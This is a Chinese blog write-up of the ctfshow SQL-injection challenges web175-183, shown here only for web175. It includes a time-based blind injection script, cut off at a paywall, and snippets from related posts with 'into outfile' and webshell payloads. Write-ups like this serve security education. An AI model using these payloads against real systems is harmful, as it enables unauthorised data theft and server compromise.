ctfshow web175-183

原创 已于 2022-03-14 18:52:40 修改 · 6.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

于 2022-03-14 18:46:47 首次发布
本文讲述了作者逐步破解Web应用中的SQL过滤,通过时间盲注、字符替代和万能密码策略,成功绕过限制获取flag的过程,涉及技术包括字符编码、SQL注入手法和绕过技术。

目录

Web 175

Web 176

Web 177

Web 178

Web 179

Web 180

Web 181

Web 182

Web 183

Web 175

if(!preg_match('/[\x00-\x7f]/i', json_encode($ret)))

刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。

\xnn 匹配ASCII代码中十六进制代码为nn的字符
[\x00-\x7f] 匹配ASCII值从0-127的字符

所以ASCII值得0-127都被过滤了,select没法用了。

只能盲注了,试一下
1' and sleep(6)--+
发现确实有延迟,所以可以考虑时间盲注。
时间盲注:
通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。简单说就是,当页面出现延时响应,且响应时间与设定的时间函数一致,则表示前半部分的猜测正确,若出现查询直接返回结果,页面响应未出现延迟,则说明未执行到时间函数的部分,and的判断中,前半部分就已经出错了。
利用脚本来获取flag。
import requests

from time import time


url='http://774b555f-930c-4ab9-acbe-7ef82922d659.chall.ctf.show/api/v5.php'


flag=''

for i in range(1,100):

    length=len(flag)

    min=32

    max=128

    while 1:

        j=min+(max-min)//2

        if min==j:

            flag+=chr(j)

            print(flag)

            break


        payload="?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),%d,1))<%d,sleep(0.5),1) -- -"%(i,j)


        start_time=time()

        r=requests.get(url=url+payload).text

        end_time=time()

        #print(r)



        if end_time-
最低0.47元/天 解锁文章
ctfshow sql入门174 175脚本
2202_75317918的博客
11-14 349
因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下。
ctfshow web入门 sqli-labs web517--web524
2301_81040377的博客
06-28 644
然后发现这几个表里面没有flag,我们重新倒回去爆库名,肯定是库错了,因为我偷工减料了。盲猜是一个md5闭合我没有跑fuzz,正常做法应该是跑个fuzz。不会的去我主页学,hhh。单引号被过滤了好像是。所以我是自己慢慢试的。闭合换了并且不是盲注。
ctfshow SQL注入Web175
m0_62584974的博客
05-01 1029
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
ctfshow_web175
qq_38634097的博客
05-28 595
0-127表示单字节字符:数字,英文字符,半角符号,以及某些控制字符。那我们换个思路,不让在页面显示,写在某个文件里,然后查看文件内容。\xnn 匹配ASCII代码中十六进制代码为nn的字符。[x00-x7f] 匹配ASCII值从0-127的字符。打开场景可以看到在本题中,页面的拦截方式做了改变。也就说,是以上字符的不会在页面显示出来。
ctfshow-web入门-sql注入(web171-web175
Welcome To My6n Blog
07-31 2932
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
ctfshow-web175详细解答
weixin_68408599的博客
04-22 494
打开hackbar在里面post传值中输入1=phpinfo();抓包显示输入错误,在头部ctf.show/后输入1.php(植入的文件)1=system("ls");可以看见api目录,进入1=system("ls ./api/");传递,$_POST[1]参数包含一串可执行代码,然后使用此参数调用。信息都已经出来,在蚁剑中进行数据操作得到以下数据。通过此条语句进行植入代码,代码将作为。
CTFshow 175 into outfile ‘/var/www/html/1.txt‘
sinat_31884905的博客
05-23 377
[x00-x7f] 匹配ASCII值从0-127的字符 0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。 限制了页面不能显示任何数据, ?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10 就跳到这里了,真的很神奇,所以说 select xxx from xxx into outfile '/var/
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 808
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow web123-127
akxnxbshai的博客
02-08 3680
目录 Web 123 Web 125 Web 126 Web 127 Web 123 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ct
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 2035
ctfshow web171-174
CTFshow web(sql注入171-175
csjjjd的博客
02-20 954
替换:将数据to_base64加密,然后将里面所有的数字用replace()替换。注意这里已经提示你了,只要知道是ctfshow_user,就可以拿到flag。然后接着一个个查询看看哪个表里面有flag,经测试,第二个表有flag。ps:注意把ctfshow后面的都删去,改成1.txt。那个过滤函数别被骗了,照样该怎么做怎么做。还是那个语句查询表名。还是那个语句查询表名。base64解码就好。
适合小白ctfshow-web入门—sql注入175-248超详细解析!!
2201_75930505的博客
09-12 980
将数据输出到一个文件中,然后访问对应文件: 这是一个UNION查询,它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。(路径是一个常见的用于存放网页文件的目录,通常被称为网页根目录。在许多Web服务器中,这个目录被设置为存放网站的主要文件,因此可以通过浏览器访问。
ctfshow web入门sql注入175
2401_84499748的博客
03-15 463
在这里我做的时候有点懵,那这个该怎么做呢,也有写脚本的,蛋对于我这种更改学了几个月的新手来说有点太难理解了,然后我看来下其他大佬的wp,我发现我们可以不在这个页面上访问到我们的flag,可以通过我们的查询,吧我们查询到的内容写到一个知道的目录下,然后我就找到了这个。然后我们知道了这个路径的话就可以在这里进行相关的文章操作了,在这里我找到了两种方法,首先就是我们的吧flag写到另外一个文件里面去,然后访问这个文件。这个就是我这道题的具体的写法,有一些细节的问题还是请各位佬海量。随后还是访问这个文件。
ctfshow web183-200
songmoshangchen的博客
05-18 326
因为 % 会自动匹配>=一个字符 所以最后一个主机加上就好了。因为 % 会自动匹配>=一个字符 所以最后一个主机加上就好了。跑到最后的时候自己加上“}”跑到最后的时候自己加上“}”
[ctfshow]web183 已知表名的布尔盲注
www.lazy.kim
06-10 428
【代码】[ctfshow]web183 已知表名的布尔盲注。
ctfshow-web入门-sql注入(web181-web185)
Welcome To My6n Blog
08-04 2090
过滤字符:(1)空白字符:空格 ( )、水平制表符 (\x09)、换行符 (\x0a)、垂直制表符 (\x0b)、换页符 (\x0c)、空字符 (\x00)、回车符 (\x0d)、不换行空格 (\xa0)(2)符号:星号 (*)、井号 (#)(3)关键词(不区分大小写):file、into、select1'--%0c1'||1--%0c拿到 flag:ctfshow{bef90a74-9ae2-4c76-8111-0ea0406f120b}
ctfshow学习记录-web入门(sql注入181-190)
龟速更新的九某人
09-24 3530
ctfshow学习记录-web入门(sql注入web181-web190)
CTFshow学习笔记---sql盲注:web175
wecanning的博客
11-02 301
盲注时使用selet into outfile
ctfshow web1-20
最新发布
04-01
### CTFShow Web 1 至 20 关解题思路 以下是关于 CTFShow 平台上 Web 类第 1 到 20 关的部分解题思路和相关信息: #### Web 1 通过分析 URL 参数 `id` 的传递方式,可以发现其存在 SQL 注入漏洞。尝试输入特殊字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值